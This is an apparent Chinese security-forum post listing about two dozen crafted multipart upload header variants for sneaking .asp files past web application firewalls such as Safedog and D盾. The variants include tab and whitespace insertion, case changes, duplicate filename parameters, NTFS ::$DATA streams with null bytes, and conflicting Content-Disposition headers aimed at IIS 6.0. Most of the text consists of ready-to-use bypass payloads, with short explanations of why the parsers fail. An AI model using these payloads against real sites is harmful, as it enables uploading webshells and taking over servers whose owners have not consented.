默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破0
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]a.asp”
Content-Type: text/html[/mw_shl_code]
突破1 去掉双引号
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=a.asp
Content-Type: text/html[/mw_shl_code]
突破2 添加一个filename1
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”;filename1=”test.jpg”
Content-Type: text/html[/mw_shl_code]
突破3 form中间+
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”test.asp”
Content-Type: text/html[/mw_shl_code]
突破4 大小写
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破5 去掉form-data
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破6 在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]
突破7 a.asp . (空格+.)
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp .”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]
突破8 “换行
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp
“
Content-Type: text/html[/mw_shl_code]
突破9 NTFS流
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA”
Content-Type: text/html
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html[/mw_shl_code]
突破10 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传test.asp成功]:
[mw_shl_code=bash,true]Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”
—————————–15377259221471
Content-Disposition: form-data; name=”FileUploadName”; filename=”test.txt”
Content-Type: application/octet-stream
Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”test.asp”[/mw_shl_code]
突破11 换位
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”[/mw_shl_code]
在上述的方法中,还有些方法可以过安全狗,也可以过D盾、360网站卫士等等。另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;部分属于系统特性,比如加空格、点号、NTFS流等等。而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。
针对于特性,在上传这一块,好像能用到的就只有系统特性和协议特性,系统特性从系统出现到现在才挖掘出那么一点点,对于我等菜鸟而言,就更难挖掘了。于是我们就把目光放到协议上。
默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
上述方法我们已经开始测试,那么,有没有想过。既然你们想得到用window特性来+空格,有没有想过用协议来+-空格
突破方法001
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法002
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法003
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type:text/html[/mw_shl_code]
突破方法004
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename= “a.asp”
Content-Type:text/html[/mw_shl_code]
突破方法005
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
上述就5种方法了,然后呢,空格可以,谁可以代替空格,tab?咱们来试试
突破方法006
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法007
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”uploaded”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法008
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename= “a.asp”
Content-Type: text/html[/mw_shl_code]
上面的方法可以延伸很多种了,记住一点,什么可以替换空格!
接下来,我们在根据之前公布的方法 ,大小写
突破方法009
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法010
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: Form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法011
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; Name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法012
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; Filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法013
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-type: text/html[/mw_shl_code]
然后,这里在针对一个漏洞结合下,记得form-data中见存在一个+号吗,为什么不能放到前面或者后面
突破方法014
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
突破方法015
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]
黑辰’by
Linux老司机